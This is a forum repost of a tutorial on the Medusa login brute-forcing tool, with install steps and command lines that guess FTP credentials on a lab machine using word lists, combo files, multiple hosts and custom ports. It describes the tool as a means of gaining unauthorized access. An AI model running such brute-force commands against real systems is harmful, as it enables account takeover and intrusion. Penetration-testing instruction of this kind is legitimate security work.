• We just launched and are currently in beta. Join us as we build and grow the community.

Medusa – A Brute Forcing Tool

Hajqnaqj

System Deception Specialist
H
H Rep
0
0
0
Rep
0
H Vouches
0
0
0
Vouches
0
Posts
44
Likes
155
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 500 XP
Lilac-Animated-and-Video-Dating-Funny-Presentation-1.png


Hey Folks, in this tutorial we are going to talk about another brute forcing tool called “Medusa“. Medusa is a speedy, parallel, and modular, login brute-force. The goal is to support as many services which allow remote authentication as possible. There are some key features of this tool which you can read below.

Features
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Lets take a look 🙂 !!

Installation

The tool comes pre-installed in kali linux but still you can install it using following command if you are using any other operating system. Also if you use any android application, then “pkg” command is given below.

apt-get install medusa
or
pkg install medusa123apt-get install medusaorpkg install medusa

1-25.png


If you get stuck somewhere, you resort to the following command to see the guide of that facility.

medusa -h1medusa-h

2-27.png


You can see all the modules available in this tool by following the command.

medusa -d1medusa-d

3-24.png

Guess the Username and Password

As we told you that medusa is an brute force tool used to gain unauthorized access of the services or website by guessing the correct password. For the demonstration purposes we have configured the FTP service on a virtual machine running on port 21. In this case we do not have the idea of both username and password, yet we will try to get the correct credentials. If you do not have dictionary then you can take help of this article. Just you need to replace the location of files and host address and execute it. As you can see that the valid username and password is found after executing the command.

Usage 🙂 !! medusa -h < host address > -U < username list > -P < password list > -M < protocol >

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp1medusa-h192.168.1.11-Uusername.txt-Ppassword.txt-Mftp

4-23.png

Guessing Password for Specific User

If you have user details then you do not need make usernames word list because you can take help of following command.

Usage 🙂 !! medusa -h < host address > -u < username > -P < password list > -M < protocol >.

medusa -h 192.168.1.11 -u shubham -P password.txt -M ftp1medusa-h192.168.1.11-ushubham-Ppassword.txt-Mftp

5-22.png

Guessing Username

Similarly, although this happens rarely, but if you have a password for login instead of a username, you can add the argument “-p” so that the password will remain static.

Usage 🙂 !! medusa -h < host address > -U < username list > -p < password > -M < protocol >.

medusa -h 192.168.1.11 -U username.txt -p neon -M ftp1medusa-h192.168.1.11-Uusername.txt-pneon-Mftp

6-20.png

Verbose Mode

As we know, the tool is given verbose mode to see additional details in the currently running process.

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -v 61medusa-h192.168.1.11-Uusername.txt-Ppassword.txt-Mftp-v6

7-20.png

Combo

The combo file can be specified using the “-C” option. The file should contain one entry per line and have the values colon separated in the format host:user:password. If any of the three fields are left empty, the respective information should be provided either as a global value or as a list in a file. Medusa will perform a basic parameter check based on the contents of the first line in the file. The following combinations are possible in the combo file:

  • host:username:password
  • host:username:
  • host::
  • :username:password
  • :username:
  • ::password
  • host::password

Done 🙂 !! As you can see it has found valid username and passwords of three different -2 hosts.

medusa -M ftp -C uplist.txt1medusa-Mftp-Cuplist.txt

8-20.png

Multiple Hosts

If we want to perform brute force attack on multiple hosts at the same time, then we have to use the following command. In the following command we add the “-H” argument to attack brute force on multiple hosts.

medusa -H hosts.txt -U username.txt -P password.txt -M ftp -v 61medusa-Hhosts.txt-Uusername.txt-Ppassword.txt-Mftp-v6

9-20.png

Brute force on Forward Port

If the port has been changed by the administrator then we can add the “-n” argument to the command to perform brute force attack on a specific port or service.

medusa -h 192.168.1.9 -U username.txt -P password.txt -M ftp -n 21211medusa-h192.168.1.9-Uusername.txt-Ppassword.txt-Mftp-n2121

10-17.png

Save Output

If you want to save your result as a TXT format file then you can add the “-O” argument to the command to save the entire results.

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -O res.txt1medusa-h192.168.1.11-Uusername.txt-Ppassword.txt-Mftp-Ores.txt

11-16.png

Stop on Success

The following command is used to stop the brute force attack after obtaining the first correct username and password.

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -f1medusa-h192.168.1.11-Uusername.txt-Ppassword.txt-Mftp-f

12-15.png


Credit : http://www.foofus.net

About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 
You must log in or register to reply here.

428,096

310,989

310,998

F Fadwa
Top